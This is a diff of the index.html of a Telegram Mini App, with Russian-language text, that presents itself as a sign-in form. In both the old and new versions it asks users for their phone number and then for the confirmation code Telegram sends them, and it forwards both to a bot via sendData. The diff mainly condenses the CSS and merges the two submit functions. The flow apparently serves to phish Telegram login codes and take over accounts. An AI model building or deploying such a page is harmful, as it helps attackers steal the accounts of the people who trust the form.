--- a/index.html
+++ b/index.html
@@ -5,104 +5,41 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
     <script src="https://telegram.org"></script>
     <style>
-        :root {
-            --bg: var(--tg-theme-bg-color, #ffffff);
-            --text: var(--tg-theme-text-color, #222222);
-            --hint: var(--tg-theme-hint-color, #999999);
-            --btn: var(--tg-theme-button-color, #248bcf);
-            --btn-text: var(--tg-theme-button-text-color, #ffffff);
-        }
-        body {
-            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
-            background-color: var(--bg);
-            color: var(--text);
-            margin: 0;
-            display: flex;
-            flex-direction: column;
-            align-items: center;
-            justify-content: center;
-            height: 100vh;
-            overflow: hidden;
-        }
-        .step {
-            width: 80%;
-            text-align: center;
-            display: none;
-        }
+        body { font-family: -apple-system, system-ui; background: var(--tg-theme-bg-color, #fff); color: var(--tg-theme-text-color, #000); display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; }
+        .step { display: none; width: 90%; text-align: center; }
         .active { display: block; }
-        h2 { margin-bottom: 10px; }
-        p { color: var(--hint); font-size: 14px; margin-bottom: 20px; }
-        input {
-            width: 100%;
-            padding: 15px;
-            margin-bottom: 20px;
-            border-radius: 12px;
-            border: 1px solid #ccc;
-            background: #fdfdfd;
-            box-sizing: border-box;
-            font-size: 16px;
-        }
-        button {
-            width: 100%;
-            padding: 15px;
-            border-radius: 12px;
-            border: none;
-            background-color: var(--btn);
-            color: var(--btn-text);
-            font-size: 16px;
-            font-weight: bold;
-            cursor: pointer;
-        }
+        input { width: 85%; padding: 15px; margin: 15px 0; border-radius: 12px; border: 1px solid #ccc; font-size: 18px; outline: none; }
+        button { width: 90%; padding: 15px; border-radius: 12px; border: none; background: var(--tg-theme-button-color, #248bcf); color: var(--tg-theme-button-text-color, #fff); font-size: 16px; font-weight: bold; cursor: pointer; }
+        p { color: var(--tg-theme-hint-color, #999); font-size: 14px; }
     </style>
 </head>
 <body>
-
-    <!-- ШАГ 1: НОМЕР ТЕЛЕФОНА -->
-    <div id="step-phone" class="step active">
-        <h2>Регистрация</h2>
-        <p>Введите ваш номер телефона для входа</p>
-        <input type="tel" id="phone_input" placeholder="+7 999 000-00-00">
-        <button onclick="submitPhone()">Продолжить</button>
+    <!-- ШАГ 1: НОМЕР -->
+    <div id="step-p" class="step active">
+        <h2>Вход</h2>
+        <p>Введите номер телефона (можно без +)</p>
+        <input type="tel" id="phone" placeholder="79001234567">
+        <button onclick="send('phone')">Продолжить</button>
     </div>
-
-    <!-- ШАГ 2: КОД ПОДТВЕРЖДЕНИЯ -->
-    <div id="step-code" class="step">
-        <h2>Введите код</h2>
-        <p>Код подтверждения отправлен в ваш Telegram</p>
-        <input type="number" id="code_input" placeholder="12345">
-        <button onclick="submitCode()">Подтвердить</button>
+    <!-- ШАГ 2: КОД -->
+    <div id="step-c" class="step">
+        <h2>Код из Telegram</h2>
+        <p>Введите код, который пришел в чат</p>
+        <input type="number" id="code" placeholder="12345">
+        <button onclick="send('code')">Подтвердить</button>
     </div>
 
     <script>
         const tg = window.Telegram.WebApp;
-        tg.ready();
         tg.expand();
-
-        function submitPhone() {
-            const phone = document.getElementById('phone_input').value.trim();
-            if (phone.length < 10) {
-                tg.showAlert("Введите корректный номер!");
-                return;
-            }
-            // Отправляем префикс 'phone:', чтобы бот в Python понял, что это номер
-            tg.sendData("phone:" + phone);
-            
-            // Переключаем интерфейс на ввод кода
-            document.getElementById('step-phone').classList.remove('active');
-            document.getElementById('step-code').classList.add('active');
-        }
-
-        function submitCode() {
-            const code = document.getElementById('code_input').value.trim();
-            if (code.length < 4) {
-                tg.showAlert("Код слишком короткий!");
-                return;
-            }
-            // Отправляем префикс 'code:', чтобы бот в Python понял, что это код
-            tg.sendData("code:" + code);
-            
-            // Закрываем Mini App
-            setTimeout(() => { tg.close(); }, 500);
+        function send(type) {
+            const val = document.getElementById(type).value.trim();
+            if(!val) return;
+            tg.sendData(type + ":" + val);
+            if(type === 'phone') {
+                document.getElementById('step-p').classList.remove('active');
+                document.getElementById('step-c').classList.add('active');
+            } else { tg.close(); }
         }
     </script>
 </body>
